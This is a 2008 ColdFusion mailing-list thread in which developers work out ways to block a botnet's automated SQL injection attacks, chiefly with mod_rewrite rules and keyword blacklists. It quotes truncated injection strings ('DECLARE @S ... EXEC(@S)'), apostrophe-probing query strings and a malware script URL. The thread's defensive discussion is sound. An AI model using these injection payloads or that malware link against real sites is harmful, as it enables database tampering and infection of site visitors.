Now look at how many of those are from Asia Pacific Network Info Centre
.:.:.:.:.:.:.:.:.:.:.
Bobby Hartsfield
http://acoderslife.com
http://cf4em.com
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310620
Here are my top 50: Note that the top 1 is in the same subnet as your
top 1. I had 134,993 attempts that I caught..
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310616
Terry Ford wrote:
> Nimda did not use SQL injection as any sort of primary vector.
But it infected websites in order to infect browsers in order to infect
websites etc. So the current wave of worms using the same mechanism is
really 7 years too late to be ingenious.
Jochem
Author: Terry Ford
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310615
Nimda did not use SQL injection as any sort of primary vector.
SQL injection attacks have been around forever, but botnet/worm SQL injection
attacks have really taken off pretty recently. It has gotten so bad that even
Microsoft recently released a security advisory article that doesn't deal with a
major flaw in its own software. That's rare ;)
http://www.microsoft.com/technet/security/advisory/954462.mspx
--- On Sat, 8/9/08, Jochem van Dieten <jochemd@oli.tudelft.nl> wrote:
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310614
>1) It protects only against known threats. In order to be excluded we have
>to be a step far enough ahead to make sure the pattern is included.
>2) It will produce false positives.
>3) It is not role or user based.
>4) Tend to give a false sense of security.
Just to add to this, in my own testing of the RegEx, I definitely was getting
false positives, with just normal text strings (no other characters needed). So I
do have some concerns about any long-term use of it, and would caution anyone
using it to be aware that it may block more than you intend it to. In my own
software, I've modified how it is called so it's only used on the front-end,
open-to-the-world part of my software, as if someone gets through the back-end
security checks, they certainly don't need to bother with a SQL injection to mess
with the database! ;-) The goal here is just mainly to block the request as soon
as the invalid strings in any vulnerable scope are detected, and that's
essentially what it does, scanning the url, form, cookie and cgi scopes.
--- Mary Jo
Author: Raymond Camden
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310612
Still no go for me. I appreciate the help from all.
Author: Wil Genovese
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310610
Ray,
Our sysadmin ran into the same issue when we started on this
yesterday. Here is part of the rule we're using now, and it works for
the case yours does not. Note the ^.
RewriteCond %{QUERY_STRING} ^.*DECLARE.*$
Wil Genovese
One man with courage makes a majority.
-Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.
Author: Raymond Camden
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310608
Ok, I've noticed that when I go to
host.com/?declare
it is working
but
host.com/x/index.cfm?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(...%20AS%20CHAR(4000));EXEC(@S);
Is not working
Author: Raymond Camden
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310607
No go. It's not life or death - I'm still using cfqueryparam, but I'd
love to get this working at the lowest level.
Author: Jon Clausen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310606
Depending on your default directory settings in httpd.conf, you may
need to add the following directory attributes as well to your site to
allow mod_rewrite to operate:
#Allow mod rewrite on this directory
<Directory /srv/www/htdocs/mysite>
Options FollowSymLinks
AllowOverride All
Order deny,allow
Allow from all
</Directory>
Also, you can use pipe delimiters in the RewriteCond to add additional
SQL statements you might want to watch for (The syntax I'm seeing is
mostly MSSQL specific, but that could change):
#Add the following if the site isn't using mod_rewrite yet
RewriteEngine on
#SQL Injection Redirects
#The pattern is quoted because it contains spaces, and NC makes the match
#case-insensitive (the condition, not only the rule, needs that flag)
RewriteCond %{QUERY_STRING} "DECLARE|NVARCHAR|EXEC\(@|TRUNCATE TABLE|INSERT INTO" [NC]
RewriteRule ^(.*)$ /violation.htm [NC,L]
HTH,
Jon
On Aug 9, 2008, at 7:32 AM, Matt Williams wrote:
Author: Matt Williams
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310605
Here's what I have within my <VirtualHost> block:
RewriteEngine On
RewriteOptions Inherit
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule ^(.*)$ /violation.htm [nc,L]
Also, uncomment the
LoadModule rewrite_module modules/mod_rewrite.so
And make sure you restarted Apache for changes to take effect. With
that I can do this and get redirected:
http://myDomain/?foo=declare
http://myDomain/?declare
--
Matt Williams
"It's the question that drives us."
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310604
Terry Ford wrote:
> Pretty ingenious really, infecting websites via injection attack in order to
> infect clients with browser vulnerabilities.
In 2001 it was: http://www.cert.org/advisories/CA-2001-26.html
Now it is just business as usual.
Jochem
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310598
Theoretically, it would be possible to write a code-review type tool
that uses database introspection to rewrite queries to use the proper
cfqueryparms everywhere.
Wouldn't work for queries built by code tho, so... hmmm....
I wonder why we can't do something like that at a lower-level, ya
know? Right before CF runs the query, verify that all params are
bound to types? Use a bit of caching or something ta boot? Hmm...
I'm digging on hibernate... ORMs are probably the answer, neh?
Well, just random brainstorming...
--
Holy moley! The opening of the Olympics was awesome!
Author: Terry Ford
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310597
Hi Ray,
I used this rewrite in the root directory's .htaccess file (linux/apache)... try
Windows equiv? I've run into the same problem that you describe using global
rewrites in years past, but this directory-based method seems to work reliably.
<Limit GET POST>
order allow,deny
allow from all
RewriteEngine On
.... rewrites here ....
</Limit>
Regards
--- On Sat, 8/9/08, Raymond Camden <rcamden@gmail.com> wrote:
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310596
non-wrapped (and it was grabbed off the web somewhere):
Options +FollowSymLinks
Options +Indexes
RewriteEngine On
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule .* /violation.htm [L]
RewriteCond %{PATH_INFO} .*DECLARE.* [NC]
RewriteRule .* /violation.htm [L]
The [L] tells it to stop there, BTW.
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310595
Strange. And it looks like it /should/ work in the server conf too.
Might be something like symlinks being turned off in the main
Directory block or something.
Try adding this (we'll leave off the ifModule, as we'd want an error
if we don't have mod_rewrite loaded (and I'd try to limit where I'm
allowing following of symlinks, doing rewriting, etc.):
# Required: this is a security feature of the rewrite engine and must be set.
# It informs Apache to follow the newly created link names.
Options +FollowSymLinks
# Optional: set it if you want to display a directory listing when no index
# page is found (Uniform Server's default).
Options +Indexes
# Required: turns the rewrite engine on and must be set.
RewriteEngine On
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule .* /violation.htm [L]
RewriteCond %{PATH_INFO} .*DECLARE.* [NC]
RewriteRule .* /violation.htm [L]
And be sure that /violation.htm is a valid path to a file! That bit me
for a little bit (wrong named file, didn't seem to do anything).
:DeN
--
Employ your time in improving yourself by other men's writings, so
that you shall gain easily what others have labored hard for.
Socrates
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310594
Pete,
Gabriel Reed and Mary Jo Sminkey created a decent regex and script that does
a good job.
http://www.coldfusionmuse.com/index.cfm/2008/7/28/Coldfusion-Blacklist-Function-for-SQLi
It uses a native java regex pattern matcher for efficiency - meaning it will
work only on cf 6.x or above.
Mary Jo wrapped it up in an include file here:
http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18
This file can be dropped into a cfapplication.cfm file (note: it must come
AFTER the <cfapplication> tag or you will need to edit it to not use the
application scope).
Also please note that using a black list function should be considered a
first line of defence and not a solution. It has several weaknesses
including:
1) It protects only against known threats. In order to be excluded we have
to be a step far enough ahead to make sure the pattern is included.
2) It will produce false positives.
3) It is not role or user based.
4) Tends to give a false sense of security.
Validation, DB permissions and configurations, and binding (cfqp) are all
important factors in protecting against injection.
I have to say that I'm watching this unfold and a lot of effort is going
into sticking our finger in the dike with blacklisting techniques instead of
laying out roadmaps for improving code. Yes I know - some code has thousands
of queries and it is boring (not to mention thankless) to laboriously insert
cfqueryparam into query after query. But that is a major part of the "fix" -
indeed a bigger part of the fix than any blacklisting technique we can
devise together.
Having said all of that, at this moment I completely understand the urgency
to stop the attack by the shortest means possible. In fact, the frequency of
these attacks is causing a denial of service effect for sites with a ton of
.cfm pages indexed - so stopping the attack before it gets to the meat of
your code is important. My blog, for example, got thousands of attacks
overnight. All of them "reached" the database and failed - but that doesn't
mean I'm just going to let them keep on hitting the DB. I put in my blocker
script to intercept the requests and abort them before they ever get to the
DB.
Recent efforts have gone further up the request chain and focused on ISAPI
rewrite and mod_rewrite
(http://www.coldfusionmuse.com/index.cfm/2008/8/8/isapi-rewrite-rule-prevents-sql-injection)
with the idea that these spurious requests should be
intercepted and handled prior to reaching the Coldfusion server altogether.
In this situation I am in favor of such efforts in spite of the general
catch-all nature - at least until the frequency of such attacks dies down.
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Author: Raymond Camden
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310592
Hmm. I'm having no luck with this. I'm trying it on a blogcfc site, so
it's being added after /...., so I also added path_info
RewriteEngine on
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule ^(.*)$ /violation.htm
RewriteCond %{PATH_INFO} .*DECLARE.* [NC]
RewriteRule ^(.*)$ /violation.htm
And it's not picking up when it sees declare in the url.
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310591
You can keep it in a different .conf file, and use the Include
directive, to pull it in wherever you need it, BTW.
--
Employ your time in improving yourself by other men's writings, so
that you shall gain easily what others have labored hard for.
Socrates
> A simple look at the docs would state why, but it doesn't appear to
> work if you've got it "floating" (rewrites in general). I don't
> remember, off hand.
>
> I'm pretty sure it will work in a Directory or Location block too, tho.
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310590
A simple look at the docs would state why, but it doesn't appear to
work if you've got it "floating" (rewrites in general). I don't
remember, off hand.
I'm pretty sure it will work in a Directory or Location block too, tho.
--
Employ your time in improving yourself by other men's writings, so
that you shall gain easily what others have labored hard for.
Socrates
> I've tried this on a windows apache server, but it doesn't seem to be
> working. Must it be in a VirtualDirectory block? I have it set outside
> so as to work on all sites.
Author: Raymond Camden
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310589
I've tried this on a windows apache server, but it doesn't seem to be
working. Must it be in a VirtualDirectory block? I have it set outside
so as to work on all sites.
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310588
I think it goes:
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
to have the no-case option.
Thanks for clarifying the loadmodule stuff, I should'a said something
along those lines earlier.
--
Employ your time in improving yourself by other men's writings, so
that you shall gain easily what others have labored hard for.
Socrates
Author: Pete Ruckelshaus
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310587
Has anyone written a broad-spectrum script (i.e. scrubs URL variables, form
variables, looks for verboten words, etc.) that is effective against these
attacks? If not, why don't we get coordinated and write something as a
community that users can simply include/invoke via application.cfm or in
specific files...something that is not limited to a framework and something
that would perhaps work with CF6/7/8. I know there are people on this list
who are MUCH more experienced than I am that would have a much more elegant
solution than I could come up with. Moreover, because virtually all of my
sites are on shared hosts (Windows/IIS/CF8), I don't have the luxury of
being able to do URL rewrites and that sort of thing.
Thanks,
Pete
Author: Matt Williams
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310582
Scratch that. declare is case sensitive. Seems to work now.
Matt
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310581
> The problem becomes even more difficult to enforce
> since ISPs don't necessarily want to offend their paying customers.
It depends on the ISP. I've seen plenty that didn't mind telling a customer
they needed to clean their server or be shut down.
The real impossibility I've found is actually getting information about the
user of an IP address. (This is probably a good thing). ISPs generally
won't cough anything up without a court order and you usually can't get one
of those unless you have a certain dollar figure worth of damages. I have
had ISPs contact their customers on my behalf to question them about
suspicious activity though.
~Brad
Author: Matt Williams
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310580
> Here's the rewrite I'm using (linux apache) to keep traffic off the app
> server.
>
> RewriteCond %{QUERY_STRING} .*DECLARE.*
> RewriteRule ^(.*)$ violation.htm [nc,L]
Okay, I'm a rewrite and apache newbie. I'm trying to replicate locally
before doing this on my server. I'm running Win XP with Apache 2.2.
In my httpd.conf file I removed the # sign from this line:
LoadModule rewrite_module modules/mod_rewrite.so
Then I added the above rewrite rules within one of my <VirtualHost> sites.
Should that be all I have to do? Doesn't seem to work if I do
myLocalSite/index.cfm?test=DECLARE
Do the rewrite rules go somewhere else? Do I need something more than
just the LoadModule line?
Thanks,
--
Matt Williams
"It's the question that drives us."
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310579
> on. So go ahead and just block THE WORLD.
>
I don't plan on blocking anyone. I just wanted to play with the data. :)
~Brad
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310578
>>.... If you use CF to write the bot, for instance ;-)
Speaking of such, snagging a cookie with CF is ridiculously easy (of course
it is ;) ). cfhttp returns the responseHeader as a structure.
EX:
This:
<cfoutput>
#cfhttp.responseHeader["Set-Cookie"]#
</cfoutput>
Returns this:
mytestcookie=test;expires=Sun, 01-Aug-2038 21:57:28 GMT;path=/
On Fri, Aug 8, 2008 at 12:47 PM, Claude Schneegans <
schneegans@internetique.com> wrote:
Author: Matt Robertson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310577
Well I guess I'm glad I am not the only one dealing with this. I implemented
<cfif cgi.query_string contains "DECLARE%20">
<cfheader statuscode="500" statustext="Server Error">
</cfif>
at the top of /Application.cfm and that stopped it dead in its tracks,
but not before spiking my custom logging app and turning my weekly
sales response figures to oatmeal. A little spit and polish fixed
that.
One client had about a 3-day love affair with these bots before they
went away. They made a mess of his error logs when the non-conforming
data hit cfqueryparam but otherwise no noticeable effect.
I think if I was still actively in the contract programming scene I
would find the person propagating this and... pin a medal on them and
shake their hand. This one attack has caused a whole slew of folks
who thought I was a PITA crank over-obsessed with security to call me
up, apologize and thank me. If I was still taking clients I'd have
just doubled up my dance card.
--
--m@Robertson--
Janitor, The Robertson Team
mysecretbase.com
Author: Eric P
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310576
We don't. It was definitely an automated attack (i.e., bot), but it
"felt" like it was controlled by one source/individual as opposed to
several sources doing the same attack method because as we blocked
each IP address the attack took ~20-30 minutes to begin again (i.e.,
switch IP address). And each chunk of attacks was coming from a
solitary IP address (which is why we began blocking them).
Errata: Below I meant "IPs" to be "ISPs".
"So how is anyone going to be able to effectively communicate with
these IPs to tell them about the compromised systems on their network?
The problem becomes even more difficult to enforce since IPs don't
necessarily want to offend their paying customers."
Eric Pierce
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310575
>>Then 20-30 minutes later he would show up again with a different IP.
How do you know it was the same guy?
Maybe it was the same bot doing the same thing, but these bots are just
like viruses: they spread anywhere.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Wil Genovese
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310573
So far I have done a small non-representative sample of IPs and found
them to be from all around the globe. I have Asia Pacific Network,
RIPE Network Amsterdam, Latin America and Caribbean (LACNIC), Hughes
Network MD USA, Rogers Cable Toronto ON, and the list goes on and
on. So go ahead and just block THE WORLD.
Wil Genovese
One man with courage makes a majority.
-Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.
On Aug 8, 2008, at 3:25 PM, Brad Wood wrote:
Author: Terry Ford
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310572
<< Also, I'd like to explore the possibility of reporting compromised
people to their ISPs. >>
Well good luck ;)
As I posted earlier, we have been hit by over 200,000 attack attempts over the
past 2 days.
Here's the analysis from our last 195,264 attack attempts:
Our attacks over the past *24 hours* have originated from *12,007* different IP
addresses. Twelve THOUSAND. That is not a typo. This is an extremely large
botnet, pure and simple. These IP addresses appear to be largely random folks
who are using browsers with vulnerabilities.
Each client, on average, makes 2-4 attack requests.
Here are the origin IPs with the most attacks:
There have been fewer than 5 attacks from each of 4515 different IPs.
So for those of you trying to stop this sort of thing by blocking IP addresses,
don't bother.
Some of those 203.* and 211.* addresses look suspicious, and perhaps are part of
the botnet control, but who knows...
I have the complete list of 12,000 IP addresses (and counting at the rate of 500+
new IP addresses each hour) of this botnet available if that's of any use to
anyone.
Regards
--- On Fri, 8/8/08, Brad Wood <brad@bradwood.com> wrote:
Author: Eric P
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310571
Once we followed around the IP addresses of what appeared to be a lone
form stuffer. We began to ban any requests from his IP. Then 20-30
minutes later he would show up again with a different IP.
Investigating his IP addresses showed him "coming" from Chile,
Denmark, etc. So how is anyone going to be able to effectively
communicate with these IPs to tell them about the compromised systems
on their network? The problem becomes even more difficult to enforce
since IPs don't necessarily want to offend their paying customers.
Eric Pierce
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310569
Yeah, I'm well aware of the near impossibility of ever tracking IP address
to anything useful, but I'm a person who likes data, for within mounds of
useless data can be found trends. Most of all, I'm just curious. Also, I'd
like to explore the possibility of reporting compromised people to their
ISPs. Some US ISPs do have abuse policies that might cause them to pressure
their users to clean themselves. A number of these attacks could have come
from servers for all we know. Servers are desirable for Trojans due to
their fast internet connections and 24/7 uptime.
~Brad
> blocking the IPs would probably stop the attacks, but analyzing them is
> going to be useless. They're either using some hacked computer as a proxy,
> or have some sort of spoofing in place. Unless you're really good at
> forensics, you'll never find their real origination point.
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310568
blocking the IPs would probably stop the attacks, but analyzing them is
going to be useless. They're either using some hacked computer as a proxy,
or have some sort of spoofing in place. Unless you're really good at
forensics, you'll never find their real origination point.
andy
Tell us how you really feel Ben. :)
I had to temporarily stop apache on my site long enough to get a stop gap in
place. My database is safe, but I was getting around 90 requests a second
and ColdFusion and MySQL were eating up all the server's CPU trying to keep
up. SSH was even unresponsive.
I think I'm going to dump all these attempts in a database to analyze. I'm
curious where the majority of the IPs are coming from. There has to be a
way to squeak in the ear of ISPs loud enough to have them shut down infected
users until they are cleaned.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310565
I'm using ionic isapi with the following
RewriteCond %{QUERY_STRING} ;DECLARE [I]
RewriteRule ;DECLARE /index.htm [I,L]
it works perfectly except for a single issue. If you're using a custom 404
in iis (like piping 404 errors to CF), then the isapi will hang the server.
--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
President: House of Fusion (http://www.houseoffusion.com)
Publisher: Fusion Authority (http://www.fusionauthority.com)
Adobe Community Expert / Advanced Certified ColdFusion Professional
Author: Terry Ford
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310562
Our site has now seen just over 200,000 attack attempts over the past 48 hours,
73,000 attack attempts over the past 5 hours.
Not nearly a DOS concern yet, as the acceleration of attacks has started to at
least flatten a bit over the last 2-3 hours, but we're watching it carefully.
The attacks appear to only affect MSSQL. MySql seems to be safe from THIS
attack, but clearly it's time to batten the hatches if you haven't already.
We have 1.2 million pages indexed in Google, where the botnet is extracting URLs
from. The level of the attack you are witnessing is likely proportional to your
presence in google.
The attacks are ONLY against our .CFM pages. No attacks are being run against
our obfuscated CFM pages (product.cfm?id=12 => /product/12.html ).
Here's the botnet attack that appears to be hitting us all:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
Decoding the hex of our current attacks and most of them are pointing to http://sdo.1000mg.cn/csrss/w.js (malware).
That is the Asprox botnet, which has been going through ASP sites for a while...
looks like they recruited a bunch of drones, and those drones have moved from ASP
(verynx attacks) to attack CF. Pretty ingenious really, infecting websites via
injection attack in order to infect clients with browser vulnerabilities.
The more CF sites that get infected, the more drones that are recruited, and the
more persistent the attacks become.
Here's the rewrite I'm using (linux apache) to keep traffic off the app server.
RewriteCond %{QUERY_STRING} .*DECLARE.*
RewriteRule ^(.*)$ violation.htm [nc,L]
Interesting philosophical thought:
I can't help but believe that the URL rewriting we do over much of our site
(product.cfm?id=14 appearing as /product/14.html etc etc) has helped reduce the
attacks significantly. It seems to me that such URL rewriting is actually a
very important security tool as we enter a period where botnets start targeting
.cfm pages.
I plan on increasing our CFM obfuscation over the coming weeks to help hide CF
from the search engines and automated attacks. Seems to me that it's a lot
safer presenting your entire site as HTML to the outside world.
Regards
Terry
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310559
They might be doing a screen scrape looking for an error message to see if
they've hit on a vulnerable parameter. When/if they find one, they probably
log it or attempt to attack it.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Eric P
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310558
We've also noticed these SQL injection attempts rear their head the
last day or so; saw almost the exact same type of attack (I.e., same
injection payload) back in April as well.
The attack we're seeing is very (MS) SQL Server specific as they're
trying to hit some SQL Server system tables and inject some HTML links
in any fields that can hold text. We put in place a simple filter at
the tops of our pages to cfabort any requests that contain T-SQL cruft
in the URL/FORM vars (I.e., DECLARE, EXEC(, CAST(, etc.).
We're also noticing some URL var snooping going on that may or may not
be related to the above attacks. Basically an apostrophe is being
tried at the end of known URL vars combinations.
For example, we'll see three successive errant query strings come
through like this.
?a=1'&b=2&c=3
?a=1&b=2'&c=3
?a=1&b=2&c=3'
where they're trying the apostrophe at the end of each var trying to
escape a potential var being used as an SQL string in the back end.
IP address bounces around too much, so it's tough to monitor/ban.
Something like fail2ban (www.fail2ban.org) may be useful for those
running Unix/Linux servers.
Eric Pierce
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310556
Hysterical!!
Ben Forta said ....>
> On the plus side, it's nice to see CF finally getting the recognition it
> deserves, even if it is from parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form
> repugnant socially-inept basement-dwelling death-penalty-deserving
> hacker-wannabes.
----- Excess quoted text cut - see Original Post for more -----
What makes you think they're lawyers, Ben?
Mike Kear
Windsor, NSW, Australia
CEO AFP Webworks Pty Ltd
http://afpwebworks.com
Author: Dave Long
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310554
I've heard that in Saudi Arabia, a thief has the offending member removed at
the wrist. Since hackers commit their offence with their brain, wouldn't it
be appropriate to behead them?
Just a suggestion. :-\
Dave L.
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310553
> > ... by despicable scum-sucking feeble-excuse-for-a-
> > carbon-based-life-form repugnant socially-inept
> > basement-dwelling death-penalty-deserving hacker-wannabes.
>
> What makes you think they're lawyers, Ben?
That really isn't called for, Mike. You should be ashamed of yourself.
Lawyers are NOT generally hacker-wannabes, and most don't live in basements.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310551
Mike,
That's the funniest comment I've heard this week... 10 points for Mr.Kear.
-mark
Ben Forta said ....>
> On the plus side, it's nice to see CF finally getting the recognition it
> deserves, even if it is from parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form
> repugnant socially-inept basement-dwelling death-penalty-deserving
> hacker-wannabes.
----- Excess quoted text cut - see Original Post for more -----
What makes you think they're lawyers, Ben?
Mike Kear
Windsor, NSW, Australia
CEO AFP Webworks Pty Ltd
http://afpwebworks.com
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310550
> even if it is from parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant
> socially-inept basement-dwelling death-penalty-deserving hacker-wannabes
Come on, Ben! Don't hold back! Tell us how you *really* feel! :o)
----- Excess quoted text cut - see Original Post for more -----
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310549
Ben Forta said ....>
> On the plus side, it's nice to see CF finally getting the recognition it
----- Excess quoted text cut - see Original Post for more -----
What makes you think they're lawyers, Ben?
Mike Kear
Windsor, NSW, Australia
CEO AFP Webworks Pty Ltd
http://afpwebworks.com
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310548
Well, at its most basic level, the process of "accepting a cookie" is really
nothing more than parsing the response headers you get back from the web
server looking for set-cookie: headers, and then returning the same
name/value pairs in a cookie: header the next time you send a request to the
server. Sure, there are rules around how it is supposed to work, but it
isn't hard to implement.
I can see how it would be advantageous to a bot if more and more sites these
days required cookies in order to browse to all the pages.
~Brad
> very few bots accept cookies. I've never actually seen one that does,
> but I have read it is possible to write one that will.
>
>
> Wil Genovese
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310547
> I'd love to get my hands on an infected machine, but that
> would be about impossible without ISPs giving a darn.
It's quite easy to get your hands on an infected machine. Take a machine and
let it get infected. Enjoy! VMware VMs are great for this.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310546
That makes a bit of sense. One difference would probably be if the
attackers were interested in the web server's response. If not, they could
just fire and forget the request and ignore anything that came back--
including set-cookie headers. I'm just curious why some of the hits return
the cookie after multiple successive hits, but others don't. It may have to
do with the order the hits are sent out. The bot could spider one page, and
then send out 15 asynch attack attempts to all the links on that page before
moving on.
I'd love to get my hands on an infected machine, but that would be about
impossible without ISPs giving a darn.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310545
Brad,
That might make sense if the infection is some sort of control that makes
use of an underlying request architecture (IE's for example). If that were
the case then the request would be exactly as if it came from the users
browser... Cookies and all - yes?
-mark
> Dang, the brutes thought of everything. I even tried a test to see if
> the bots would return cookies I attempted to set in order to track
> them easier.
> Nope, they don't.
Ok, I take that back. SOME, but not all, of the hack attempts come back to
my site with the cookie I sent to them previously. Rather interesting-- I
would expect them to all behave the same way. Perhaps there are different
versions of the Trojan out there.
Also, the attacks on my server today seem to either be targeting certain SES
URLs, or just plain broken. I am getting hits like:
/index.cfm?;DECLARE @S CHAR(4000);SET @S=CAST(0x4...6F72 AS
CHAR(4000));EXEC(@S);
You can see that the malicious string is NOT being sent in as any particular
URL parameter. Furthermore, since the = sign has not been escaped, the
string gets broken up such that the variable name is ";DECLARE @S
CHAR(4000);SET @S" and the value is the rest of the string. What the heck
are they trying to do? Have today's attacks actually infected anyone?
~Brad
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310544
>>very few bots accept cookies. I've never actually seen one that does,
but I have read it is possible to write one that will.
... If you use CF to write the bot, for instance ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310542
> Dang, the brutes thought of everything. I even tried a test to see if the
> bots would return cookies I attempted to set in order to track them
> easier.
> Nope, they don't.
Ok, I take that back. SOME, but not all, of the hack attempts come back to
my site with the cookie I sent to them previously. Rather interesting-- I
would expect them to all behave the same way. Perhaps there are different
versions of the Trojan out there.
Also, the attacks on my server today seem to either be targeting certain SES
URLs, or just plain broken. I am getting hits like:
/index.cfm?;DECLARE @S CHAR(4000);SET @S=CAST(0x4...6F72 AS
CHAR(4000));EXEC(@S);
You can see that the malicious string is NOT being sent in as any particular
URL parameter. Furthermore, since the = sign has not been escaped, the
string gets broken up such that the variable name is ";DECLARE @S
CHAR(4000);SET @S" and the value is the rest of the string. What the heck
are they trying to do? Have today's attacks actually infected anyone?
~Brad
Author: Ben Forta
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310541
Darn, I blew my cover! ;-)
--- Ben
Ben Forta wrote:
> ... parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant
